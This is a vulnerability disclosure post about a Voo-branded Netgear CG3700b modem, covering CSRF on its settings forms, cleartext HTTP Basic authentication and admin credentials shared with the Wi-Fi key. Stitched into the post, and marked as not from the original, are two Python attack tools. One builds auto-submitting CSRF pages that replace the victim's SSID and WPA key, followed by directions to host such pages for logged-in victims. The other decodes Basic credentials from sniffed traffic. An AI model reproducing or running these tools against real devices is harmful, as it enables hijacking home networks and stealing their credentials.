Just before I left for America, I found a few Netgear CG3700b vulnerabilities in my Voo branded modem.
Voo branded Netgear CG3700b Vulnerabilities – Introduction
As 90 days have passed since disclosing these issues to the vendor (see timeline below), it was time for me to publicly disclose my findings and payloads.
CVEs are still pending, but I will add them to this post when I receive them.
Cross-Site Request Forgery (CSRF) on all form POSTs
The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack against all configuration settings (/goform/
Example CSRF form (the victim's browser must already hold the modem's Basic-auth credentials, which it then attaches to the forged POST automatically; no anti-CSRF token or Origin/Referer check stands in the way):
<form method="POST" name="form0" action="http://192.168.0.1/goform/index">
  <input type="hidden" name="group_parametrage_wifi" value="active">
  <input type="hidden" name="reseau_wifi_name" value="NEWSSID">
  <input type="hidden" name="nom_select" value="AUTO-PSK">
  <input type="hidden" name="canal" value="0">
  <input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
  <input type="hidden" name="NBandwidth" value="20">
  <input type="hidden" name="group_parametrage_wifi_an" value="active">
  <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
  <input type="hidden" name="nom_select_an" value="AUTO-PSK">
  <input type="hidden" name="canal_an" value="0">
  <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
  <input type="hidden" name="NBandwidth_an" value="20">
  <input type="hidden" name="group_fon" value="desactiver">
  <input type="hidden" name="buttonApply" value="1">
  <input type="hidden" name="only_mode" value="0">
  <input type="hidden" name="selected_ch_an" value="1">
</form>
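The form above is hand-written for one endpoint. As an added example (my own code, not from the original post or from Netgear/Voo), the script below generalises it: it takes a captured application/x-www-form-urlencoded POST body, lets you swap in attacker-chosen values, and emits an auto-submitting HTML page that re-plays the request through the victim's browser, which is exactly why the missing anti-CSRF token matters. The captured body is constructed for this example using the same parameter names as the page's form; the URL and values are placeholders.

```python
# Added example: generate an auto-submitting CSRF proof-of-concept page from a
# captured form-encoded POST body. Not code from the original post.
import html
from urllib.parse import parse_qsl

# Constructed sample body (parameter names mirror the page's /goform/index
# form; values are placeholders, not captured from a real device).
CAPTURED_BODY = (
    "group_parametrage_wifi=active&reseau_wifi_name=NEWSSID"
    "&nom_select=AUTO-PSK&canal=0&mot_de_passe=NEWWPAKEY&NBandwidth=20"
    "&group_fon=desactiver&buttonApply=1&only_mode=0"
)
TARGET_URL = "http://192.168.0.1/goform/index"  # assumed target from the page


def build_csrf_page(action_url, body, overrides=None, form_name="form0"):
    """Return an HTML page that POSTs the captured parameters to action_url.

    overrides maps parameter name -> new value; names not present in the
    capture are appended so extra parameters can be injected too.
    """
    overrides = dict(overrides or {})
    # keep_blank_values so "param=" is still sent, as the original browser did
    rows = [(name, overrides.pop(name, value))
            for name, value in parse_qsl(body, keep_blank_values=True)]
    rows.extend(overrides.items())

    # html.escape(quote=True) so captured values cannot break out of the
    # attribute and corrupt the page (the capture is untrusted input too)
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s">'
        % (html.escape(n, quote=True), html.escape(v, quote=True))
        for n, v in rows
    )
    return (
        "<html><body>\n"
        '  <form method="POST" name="%s" action="%s">\n%s\n  </form>\n'
        # auto-submit on load: the victim only has to open the page; the
        # browser adds the cached Basic-auth header itself
        '  <script>document.forms["%s"].submit();</script>\n'
        "</body></html>\n"
        % (html.escape(form_name, quote=True),
           html.escape(action_url, quote=True), inputs, form_name)
    )


def page_sets(page, name, value):
    """Check helper: does the generated page submit name=value?"""
    needle = '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))
    return needle in page


if __name__ == "__main__":
    # replay the captured request with the SSID and WPA key replaced
    print(build_csrf_page(TARGET_URL, CAPTURED_BODY,
                          overrides={"reseau_wifi_name": "EVIL",
                                     "mot_de_passe": "attackerkey1"}))
```

Host the generated page anywhere the victim will browse to it while logged in to the modem; the same generator works for any of the /goform/ handlers once you have one legitimate POST body for them.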
Insufficient Authentication (OWASP-A2)
This same modem handles authentication with HTTP Basic authentication over the default plaintext (HTTP, non-SSL) connection. Basic authentication only Base64-encodes the username and password, it does not encrypt them, so anyone who can observe the traffic decodes the credentials instantly and authenticates to the router. This only requires an attacker to be positioned on the same network as the router (wired LAN or the wireless network) and sniff the clear-text traffic.
POST http://192.168.0.1/goform/parametre_config HTTP/1.1
Host: 192.168.0.1
Connection: keep-alive
Content-Length: 24721
Cache-Control: max-age=0
Authorization: Basic dm9vOlBBU1NXT1JE
# cat voo.txt
dm9vOlBBU1NXT1JE
# base64 --decode voo.txt
voo:PASSWORD
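Decoding one header by hand is enough for a write-up; in practice you run it over a whole capture. As an added example (my own code, not from the original post), the script below scans captured plaintext HTTP requests for Authorization: Basic headers, decodes each token per RFC 7617 (the password may itself contain a colon), ignores Digest and malformed headers, and reports unique (host, user, password) triples. The three requests are constructed for this example; only the Base64 value from the page's request is real.

```python
# Added example: recover HTTP Basic credentials from captured plaintext
# requests. Not code from the original post.
import base64
import binascii
import re

# Constructed sample capture (not a real pcap). The first request reuses the
# Authorization value shown on the page; the other two exist to show that a
# Digest header and a malformed Basic token are skipped, not mis-reported.
CAPTURED_REQUESTS = [
    "POST /goform/parametre_config HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\n"
    "Authorization: Basic dm9vOlBBU1NXT1JE\r\n"
    "Content-Length: 0\r\n\r\n",
    "GET /goform/index HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\n"
    'Authorization: Digest username="voo", realm="x", nonce="abc"\r\n\r\n',
    "GET / HTTP/1.1\r\n"
    "Host: 192.168.0.1\r\n"
    "Authorization: Basic not*base64\r\n\r\n",
]

# scheme name is case-insensitive; token is the Base64 alphabet plus padding
BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$",
                      re.I | re.M)
HOST_RE = re.compile(r"^Host:\s*(\S+)\s*$", re.I | re.M)


def decode_basic(token):
    """Decode one Basic token to (user, password), or None if undecodable."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    # RFC 7617: user-id ":" password; split on the FIRST colon only, since
    # user-ids cannot contain ':' but passwords can
    user, sep, password = raw.decode("utf-8", errors="replace").partition(":")
    if not sep:
        return None
    return user, password


def extract_credentials(requests):
    """Return unique (host, user, password) triples found in the requests."""
    found = []
    for req in requests:
        host_match = HOST_RE.search(req)
        host = host_match.group(1) if host_match else "?"
        for token in BASIC_RE.findall(req):
            creds = decode_basic(token)
            if creds is None:
                continue  # malformed token, nothing usable
            triple = (host, creds[0], creds[1])
            if triple not in found:
                found.append(triple)
    return found


if __name__ == "__main__":
    for host, user, password in extract_credentials(CAPTURED_REQUESTS):
        print("%s  %s:%s" % (host, user, password))
```

Feed it the request text you pull from a sniffer on the LAN or WLAN; because the modem speaks HTTP only, every administrative login and every settings POST carries the header in the clear.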
Insufficient Authentication (OWASP-A2) – Shared Administrative and Wireless Credentials
The Voo Netgear CG3700b also uses, by default, the same key for authentication to the administrative console and for the wireless network (WPA2 pre-shared key).
If a WPA2 flaw were found that made cracking the key simple, if the HTTP Basic credential were brute-forced (known charset of A-Z and 8 characters, a keyspace of 26^8, roughly 2.1 × 10^11 candidates), or if some other vulnerability were found in either component, then compromising one would compromise both systems instead of just one.
- 2016-01-22 – Discovered vulnerabilities; initially notified vendor.
- 2016-01-23 – Requested CVE.
- 2016-03-07 – Contacted vendor again, they notified me that they will not fix these issues at this time.
- 2016-04-20 – Attempted to contact Mitre again to receive CVE.
- 2016-04-21 – Sent to Full Disclosure.
- 2016-04-23 – Additional information and full disclosure published here.
- 2016-04-26 – Resent to Full Disclosure due to some errors.
- 2019-06-20 – Requested CVEs again with the new form.
Voo branded Netgear CG3700b Vulnerabilities – Conclusion
All in all, a fun weekend, and a few good findings.
The vendor has not gotten back to me regarding a patch for these issues, but I know that some of their other offerings are allegedly less vulnerable.
I will add any additional information to this post as necessary, but you can find the FullDisclosure report here.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.